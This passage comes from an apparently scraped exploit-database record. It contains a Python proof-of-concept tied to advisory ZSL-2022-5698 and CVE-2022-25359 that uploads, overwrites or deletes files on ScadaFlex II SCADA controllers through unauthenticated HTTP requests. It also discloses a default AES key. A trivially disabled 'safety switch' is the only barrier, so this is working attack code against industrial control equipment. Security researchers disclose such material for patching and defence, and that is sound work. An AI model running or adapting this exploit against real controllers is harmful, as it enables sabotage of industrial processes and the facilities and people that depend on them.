Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2022-5698\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\r\n#\r\n# CVE ID: CVE-2022-25359\r\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\r\n#\r\n#\r\n# 06.11.2021\r\n#\r\n\r\nimport time,sys\r\nimport requests\r\nimport datetime\r\nimport showtime\r\n\r\n# Default\r\n# AES Encryption Key = 'ABCD1234abcd:ICL'\r\n\r\ndef bann():\r\n print('''\r\n----------------------------------------------------------\r\n ) ) ) ) ) )\r\n ( ( ( ( ( (\r\n ) ) ) ) ) )\r\n (~~~~~~~~~) (~~~~~~~~~)\r\n | t00t | | w00t |\r\n | | | |\r\n I _._ I _._\r\n I /' `\\\\ I /' `\\\\\r\n I | M | I | J |\r\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\r\n .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |\r\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\r\n\r\n ScadaFlex II SCADA Controllers\r\n Remote write/delete PoC\r\n ZSL-2022-5698\r\n----------------------------------------------------------\r\n ''')\r\n\r\ndef safe(*trigger, ):\r\n return True # |-| Safety Switch\r\n\r\ndef choice(n):\r\n try:\r\n if n == 1:\r\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\r\n elif n == 2:\r\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\r\n else:\r\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\r\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\r\n raise SystemExit('t00t')\r\n except Exception as tip:\r\n raise SystemExit(tip)\r\n\r\ndef jump():\r\n choice(1) if len(sys.argv) == 4 else next\r\n choice(2) if len(sys.argv) == 3 else next\r\n\r\ndef overwrite(controllerip, filepos):\r\n print('Starting script at', start)\r\n localfile = sys.argv[2]\r\n\r\n with open(localfile, 'rb') as opener:\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/d.php?N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',73,'\r\n scadaurl += opener.name\r\n scadaurl += '~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.post(scadaurl, files = {'upload' : opener})\r\n\r\n if '100' in see.text:\r\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\r\n print('URL: http://' +controllerip+ '/l/' +localfile)\r\n else:\r\n print(\"- controller webserver error.\")\r\n exit()\r\n\r\ndef delete(controllerip, filepos):\r\n print('Starting script at', start)\r\n exit(42) if isinstance(filepos, str) else next\r\n\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/rW12IcL_Dat_N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',0=1~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.get(scadaurl)\r\n\r\n check = '\\x72\\x57' #|\r\n check += '\\x31\\x32' #|\r\n check += '\\x49\\x63' #|\r\n check += '\\x4c\\x5f' #|\r\n check += '\\x44\\x61' #|\r\n check += '\\x74\\x5f' #|\r\n check += '\\x4e'# o' #|\r\n check += str(filepos)#|\r\n check += '\\x2c\\x30' #|\r\n check += '\\x09\\x52' #|\r\n \r\n if check in see.text:\r\n print('File at position {} deleted.'.format(filepos))\r\n else:\r\n \tprint('- controller webserver error.')\r\n exit()\r\n\r\ndef main():\r\n if safe(True):\r\n print('Careful...\\nSafety: ON')\r\n exit(17)\r\n else:\r\n print('Safety: OFF', end = '')\r\n global start\r\n start = datetime.datetime.now()\r\n start = start.strftime('%d.%m.%Y %H:%M:%S')\r\n bann(), jump(), choice(1959)\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50783", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}]}

ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification Exploit

Description

Related